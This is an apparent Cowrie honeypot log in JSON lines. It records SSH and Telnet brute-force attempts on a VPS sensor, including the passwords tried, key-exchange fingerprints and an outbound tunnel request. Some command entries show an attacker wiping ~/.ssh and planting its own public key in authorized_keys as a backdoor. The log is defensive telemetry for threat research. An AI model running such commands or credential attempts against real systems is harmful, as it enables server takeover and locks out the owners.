{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:48:34.332818Z","src_ip":"45.88.8.215","session":"a8b0220f56c1"}
{"eventid":"cowrie.login.failed","username":"ircd","password":"ircd123","message":"login attempt [ircd/ircd123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:48:34.548745Z","src_ip":"212.227.235.229","session":"c8056a9f9e52"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:35.820064Z","src_ip":"212.227.235.229","session":"c8056a9f9e52"}
{"eventid":"cowrie.login.success","username":"root","password":"Kishore@123","message":"login attempt [root/Kishore@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:48:36.509839Z","src_ip":"45.88.8.215","session":"a8b0220f56c1"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:36.920378Z","src_ip":"45.88.8.215","session":"a8b0220f56c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36812,"dst_ip":"1.2.3.4","dst_port":23,"session":"2963ed33c58b","protocol":"telnet","message":"New connection: 212.227.235.229:36812 (1.2.3.4:23) [session: 2963ed33c58b]","sensor":"my-vps","timestamp":"2025-08-26T04:48:40.375410Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59394,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2665d842a47","protocol":"ssh","message":"New connection: 212.227.235.229:59394 (1.2.3.4:22) [session: e2665d842a47]","sensor":"my-vps","timestamp":"2025-08-26T04:48:58.788720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:58.789993Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:58.864799Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.login.success","username":"root","password":"root123456/","message":"login attempt [root/root123456/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.203951Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:48:59.419942Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.420689Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.422236Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.497902Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:48:59.665877Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.666640Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.743188Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.744016Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59396,"dst_ip":"1.2.3.4","dst_port":22,"session":"99381deb540a","protocol":"ssh","message":"New connection: 212.227.235.229:59396 (1.2.3.4:22) [session: 99381deb540a]","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.813936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.814604Z","src_ip":"212.227.235.229","session":"99381deb540a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:59.886258Z","src_ip":"212.227.235.229","session":"99381deb540a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:49:00.213419Z","src_ip":"212.227.235.229","session":"99381deb540a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.288227Z","src_ip":"212.227.235.229","session":"99381deb540a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59402,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c5ac1153116","protocol":"ssh","message":"New connection: 212.227.235.229:59402 (1.2.3.4:22) [session: 1c5ac1153116]","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.364016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.365115Z","src_ip":"212.227.235.229","session":"1c5ac1153116"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.442020Z","src_ip":"212.227.235.229","session":"1c5ac1153116"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.788981Z","src_ip":"212.227.235.229","session":"1c5ac1153116"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.868243Z","src_ip":"212.227.235.229","session":"e2665d842a47"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:01.869414Z","src_ip":"212.227.235.229","session":"1c5ac1153116"}
{"eventid":"cowrie.session.closed","duration":31.338728189468384,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:11.714064Z","src_ip":"212.227.235.229","session":"2963ed33c58b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27889,"dst_ip":"1.2.3.4","dst_port":22,"session":"77604d645f88","protocol":"ssh","message":"New connection: 212.227.125.160:27889 (1.2.3.4:22) [session: 77604d645f88]","sensor":"my-vps","timestamp":"2025-08-26T04:49:19.372713Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:19.374266Z","src_ip":"212.227.125.160","session":"77604d645f88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28140,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7a945b13685","protocol":"ssh","message":"New connection: 212.227.125.160:28140 (1.2.3.4:22) [session: b7a945b13685]","sensor":"my-vps","timestamp":"2025-08-26T04:49:19.483761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:49:19.484823Z","src_ip":"212.227.125.160","session":"b7a945b13685"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T04:49:19.597928Z","src_ip":"212.227.125.160","session":"b7a945b13685"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:49:19.939496Z","src_ip":"212.227.125.160","session":"b7a945b13685"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T04:49:20.053524Z","session":"b7a945b13685"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39076,"dst_ip":"1.2.3.4","dst_port":22,"session":"022422f6c6ed","protocol":"ssh","message":"New connection: 212.227.235.229:39076 (1.2.3.4:22) [session: 022422f6c6ed]","sensor":"my-vps","timestamp":"2025-08-26T04:49:30.230842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:49:30.231756Z","src_ip":"212.227.235.229","session":"022422f6c6ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:49:35.217229Z","src_ip":"212.227.235.229","session":"022422f6c6ed"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:35.219065Z","src_ip":"212.227.235.229","session":"022422f6c6ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57306,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5485e7f2475","protocol":"ssh","message":"New connection: 212.227.235.229:57306 (1.2.3.4:22) [session: c5485e7f2475]","sensor":"my-vps","timestamp":"2025-08-26T04:49:46.426595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:49:46.427669Z","src_ip":"212.227.235.229","session":"c5485e7f2475"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:49:46.696996Z","src_ip":"212.227.235.229","session":"c5485e7f2475"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456789","message":"login attempt [administrator/123456789] failed","sensor":"my-vps","timestamp":"2025-08-26T04:49:47.816818Z","src_ip":"212.227.235.229","session":"c5485e7f2475"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:49.091742Z","src_ip":"212.227.235.229","session":"c5485e7f2475"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43328,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bb5b846a524","protocol":"ssh","message":"New connection: 212.227.235.229:43328 (1.2.3.4:22) [session: 6bb5b846a524]","sensor":"my-vps","timestamp":"2025-08-26T04:49:54.947875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:49:54.948913Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.020165Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer123!","message":"login attempt [root/Qwer123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.347077Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:49:55.552127Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.553059Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.553918Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:49:55.626401Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:49:55.787846Z","src_ip":"212.227.235.229","session":"6bb5b846a524"}
